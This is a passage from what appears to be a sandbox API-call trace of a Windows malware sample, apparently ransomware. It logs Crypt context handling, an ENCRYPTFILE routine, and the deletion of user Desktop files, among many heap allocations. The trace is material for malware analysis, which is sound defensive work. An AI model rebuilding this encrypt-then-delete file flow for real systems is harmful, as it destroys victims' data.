lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.444] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0132.444] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0132.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0132.444] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0132.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.444] FreeLibrary (hLibModule=0x756e0000) returned 1 [0132.444] CloseHandle (hObject=0x258) returned 1 [0132.445] CloseHandle (hObject=0x2a0) returned 1 [0132.447] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv", lpFilePart=0x0) returned 0x3a [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0132.447] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\jk_t2yqtjjg2-b-hh.flv")) returned 0x20 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0132.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0132.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0132.448] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d0c400, ftCreationTime.dwHighDateTime=0x1d5ebc6, ftLastAccessTime.dwLowDateTime=0x6603a40, ftLastAccessTime.dwHighDateTime=0x1d5eb48, ftLastWriteTime.dwLowDateTime=0x6603a40, ftLastWriteTime.dwHighDateTime=0x1d5eb48, nFileSizeHigh=0x0, nFileSizeLow=0x13c5b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Jk_T2yqTjjg2-B-HH.flv", cAlternateFileName="JK_T2Y~1.FLV")) returned 0x41ac640 [0132.448] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\jk_t2yqtjjg2-b-hh.flv")) returned 1 [0132.608] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d0c400, ftCreationTime.dwHighDateTime=0x1d5ebc6, ftLastAccessTime.dwLowDateTime=0x6603a40, ftLastAccessTime.dwHighDateTime=0x1d5eb48, ftLastWriteTime.dwLowDateTime=0x6603a40, ftLastWriteTime.dwHighDateTime=0x1d5eb48, nFileSizeHigh=0x0, nFileSizeLow=0x13c5b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Jk_T2yqTjjg2-B-HH.flv", cAlternateFileName="JK_T2Y~1.FLV")) returned 0 [0132.608] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0132.609] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0132.609] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314838 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0132.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0132.609] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0132.609] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0132.655] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0132.656] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0132.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0132.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0132.657] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0132.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0132.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0132.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0132.657] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0132.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.657] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\lB o7wz9.bmp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58235170, ftCreationTime.dwHighDateTime=0x1d5e3d0, ftLastAccessTime.dwLowDateTime=0x4ffd3e60, ftLastAccessTime.dwHighDateTime=0x1d5ebf1, ftLastWriteTime.dwLowDateTime=0x4ffd3e60, ftLastWriteTime.dwHighDateTime=0x1d5ebf1, nFileSizeHigh=0x0, nFileSizeLow=0x6a36, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="lB o7wz9.bmp", cAlternateFileName="LBO7WZ~1.BMP")) returned 0x41ac280 [0132.657] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0132.658] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0132.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0132.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0132.659] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0132.659] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0132.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca490 [0132.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0132.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0132.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0132.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0132.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0132.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0132.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0132.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0132.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0132.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0132.661] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0132.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.661] HeapFree (in: 